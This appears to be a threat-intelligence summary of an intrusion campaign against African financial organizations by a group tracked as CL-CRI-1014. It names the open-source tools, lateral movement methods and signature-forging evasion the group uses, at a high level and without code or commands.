Cybercriminals Abuse Open-Source Tools To Target Africa's Financial Sector
Essential information
- Published
- 26/06/2025 17:27
- Modified
- 27/06/2025 07:25
- Tags
- 2025-06-26 chisel financial sector lateral movement poshc2
- Related entities
- 32 observables, 1 intrusion sets (apt), 12 techniques (mitre), 3 malware, 3 others
Description
A series of attacks targeting financial organizations across Africa has been observed since July 2023. The threat actor, tracked as CL-CRI-1014, uses open-source and publicly available tools like PoshC2, Chisel, and Classroom Spy to establish attack frameworks, create tunnels for network communication, and perform remote administration. They forge file signatures to disguise their toolset and mask malicious activities. The attackers are suspected to be acting as initial access brokers, creating footholds in financial institutions to sell access on darknet markets. Their playbook includes lateral movement techniques such as creating remote services, executing through DCOM, and using PsExec. The threat actor also employs evasion methods like using packers and signing tools with stolen signatures.